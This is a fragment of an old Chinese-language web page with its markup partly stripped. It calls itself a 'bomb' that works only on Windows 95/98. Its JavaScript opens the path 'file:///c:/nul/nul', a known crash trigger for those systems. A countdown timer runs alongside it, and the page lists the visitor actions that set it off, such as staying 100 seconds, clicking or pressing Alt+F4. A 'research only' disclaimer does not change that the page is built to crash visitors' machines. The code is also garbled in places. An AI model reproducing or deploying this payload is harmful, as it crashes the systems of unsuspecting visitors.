function leave() {
window.open(file:///c:/nul/nul,,toolbar=no,menubar=no,location=no,height=1,width=1);
}
// End -->
var timerID = null
var timerRunning = false
var stardate = new Date()
var startime = gettotalsecond(stardate)
function stopclock(){
if(timerRunning)
clearTimeout(timerID)
timerRunning = false
}
function startclock(){
stopclock()
showtime()
}
function gettotalsecond(getdate) {
var hours = getdate.getHours()
var minutes = getdate.getMinutes()
var seconds = getdate.getSeconds()
var gettotalsecond = seconds + minutes * 60 + hours * 3600
return(gettotalsecond)
}
function showtime(){
var now = new Date()
var timevalue = gettotalsecond(now)
document.clock.face.value = timevalue - startime
timerID = setTimeout("showtime()",1000)
timerRunning = true
}
size="6">
=枫之站=
size="1" color="#FF00FF">您已经用去了秒时间 color="darkblue" size="6">
此炸弹只队WINDOWS95/98有效
声明:此东东只供研究使用,如用做不正当用途后果自负!
以下*作可以引爆炸弹!!!
1.在本页停留100秒以上;
2.在浏览区点击左右键;
3.点击关闭按钮关闭此窗口;
4.使用“CTRL+ALT+DEL”结束任务;
5.使用“ALT+F4”关闭此窗口;

